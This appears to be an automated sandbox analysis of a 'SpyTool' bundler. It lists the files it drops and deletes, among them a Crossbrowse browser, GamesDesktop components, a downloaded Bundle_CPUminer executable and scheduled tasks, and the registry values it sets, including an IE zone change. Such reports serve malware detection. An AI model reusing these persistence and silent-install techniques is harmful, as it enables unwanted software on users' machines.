%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3496\prefs (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762 (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\crossbrowse.exe (0 bytes)
The process upgmsd_re_005010077.exe:1364 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
The process nsm25.tmp:240 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw29.tmp (6012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\md5dll.dll (6 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\md5dll.dll (0 bytes)
The process nst16.tmp:1340 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa19.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv18.tmp (0 bytes)
The process nsh2B.tmp:344 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-A2FKP.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010077\is-9C6SV.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-IFSM2.tmp (2105 bytes)
%Program Files%\gmsd_re_005010077\gamesdesktop_widget.exe (77294 bytes)
%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe (29430 bytes)
%Program Files%\gmsd_re_005010077\unins000.dat (29081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ex.bat (1564 bytes)
%Program Files%\gmsd_re_005010077\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\CheckProc.cmd (288 bytes)
%Program Files%\gmsd_re_005010077\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-VS088.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-V8RVC.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-2EA6S.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\itdownload.dll (1281 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ITDOWNLOAD.DLL (0 bytes)
The process nsh2B.tmp:1860 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp\nsh2B.tmp (3779 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp\nsh2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp (0 bytes)
The process encrypt.exe:560 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.exe (31997 bytes)
The process encrypt.exe:1400 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.exe (24223 bytes)
The process encrypt.exe:424 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.exe (1911 bytes)
The process encrypt.exe:460 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.exe (92831 bytes)
The process 3075.exe:976 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3496\prefs (823 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\expedia.ico (1921 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\youtube.ico (3913 bytes)
%WinDir%\Tasks\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.job (1668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\imdb.ico (2993 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\cnn.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\priceline.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tumblr.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\twitter.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\chrome.packed.7z (1402273 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].002 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].003 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].005 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\reddit.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yelp.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ebay.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\etsy.ico (3913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\wikipedia.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nba.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yandex.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bing.ico (1597 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A (0 bytes)
%WinDir%\Tasks\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.job (0 bytes)
The process nsiB.tmp:644 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjE.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (0 bytes)
The process nsw7.tmp:1688 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp (0 bytes)
The process nst36.tmp:2008 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu39.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu39.tmp (0 bytes)
The process nsw22.tmp:272 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_CPUminer[1].exe (7288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp (0 bytes)
Registry activity
The process nsg13.tmp:912 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 D9 7D EB 23 7F D5 EC 61 F0 AB E6 E4 1C 3F FD"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process %original file name%.exe:1504 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 69 3F DD D8 9D 52 81 D6 47 DB E5 04 8A 52 EA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
